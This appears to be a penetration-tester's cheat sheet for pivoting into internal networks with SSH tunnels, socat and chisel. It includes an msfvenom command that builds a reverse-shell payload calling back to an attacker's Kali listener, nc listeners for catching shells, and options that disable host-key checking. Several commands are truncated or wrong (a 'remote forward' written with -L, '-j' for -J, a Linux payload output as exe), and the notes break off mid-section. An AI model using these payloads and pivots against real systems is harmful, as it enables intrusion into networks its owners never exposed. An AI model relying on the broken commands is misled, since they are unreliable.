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SSH Tunneling 101
# SSH local port forward to reach an_internal_server_ip:port via server_ip
ssh tunneler@server_ip -p 2222 -L 1234:an_internal_server_ip:80
# Now curl localhost:1234 will fetch an_internal_server_ip:80 which is reachable from server_ip only
# dynamic port forward to create a SOCKS proxy to visit any_internal_server_ip
ssh tunneler@server_ip -p 2222 -D 1080
# next config proxychains socks4a localhost 1080; proxychains curl http://any_internal_server_ip/; which is reachable from server_ip only
# ProxyJump ssh to an_internal_host via ssh server_ip
ssh -J tunneler@server_ip:2222 whistler@an_internal_host # which is only accessible from server_ip
# SSH remote port forward to send traffic back to our local port from a port of server_ip
ssh whistler@server_ip -p 2222 -L 58671:localhost:1234 #
# this will listen on port 58671 of server_ip and tunnel the traffic back to us on loclahost:1234; nc -nlvp 1234 to receive for example
# Chain ProxyJump + dynamic port forward to create a proxy of 2nd_box which is only accessible via 1st_box
ssh -j firstuser@1st_box:2222 seconduser@2nd_box -D 1080
# next config proxychains socks4a localhost 1080; proxychains curl http://any_internal_server_ip/; which is reachable from 2nd_box only
# bypass first time prompt when have non-interactive shell
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no"
-R 8081: # (on my Kali machine listen on 8081, get it from
# <KALI>:8081<------------<REMOTE>:80
# Now you can access, which you didn't have direct access to
-L 8083: # (on your machine listen on 8083, send it to my Kali machine on 8084)
# <KALI>:8084<------------<REMOTE>:8083<------------<REMOTE X.X.X.X>:XXXX
# run nc on port 8084, and if receives a reverse shell, you will get it
For reverse shell:
msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=8083 -f exe -o shell
Run it on 2nd remote target to get a shell on Kali
If you didn't have an SSH session
First, SSH to your Kali from target machine
On Kali:
service ssh start
# "add a user, give it /bin/false in /etc/passwd"
ssh - -R 12345: test@
Port Forwarding (Single port to one port)
Using Socat
For linux
Forward your 8083 to
./socat TCP4-LISTEN:8083,fork TCP4:
Using Chisel
Most platforms
Remote static tunnels "port to port":
#On Kali "reverse proxy listener":
./chisel server -p 8000 -reverse
#General command:
Remote tunnels "access IP:PORT you couldn't access before":